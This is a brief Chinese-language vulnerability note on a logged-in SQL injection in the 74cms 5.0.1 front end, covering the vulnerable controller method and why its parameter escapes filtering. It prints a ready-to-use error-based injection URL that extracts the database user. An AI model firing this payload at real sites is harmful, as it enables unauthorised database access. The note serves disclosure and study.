74cms v5.0.1 前台sql注入¶
一、漏洞简介¶
74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入
二、漏洞影响¶
三、复现过程¶
具体信息
文件位置:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php
方法:function company_focus($company_id)
是否需登录:需要
登录权限:普通用户即可
Payload:
http://url/74cms/5.0.1/upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa%22) and updatexml(1,concat(0x7e,(select user())),0) -- a
源码分析:
文件:74cms\upload\Application\Home\Controller\AjaxPersonalController.class.php
company_focus 方法是参数化函数,$company_id参数是不经过I函数过滤的,所以只要where可以控制,那就可以注入
跟踪add_focus(),发现SQL语句参数外部都可以控制,导致了注入漏洞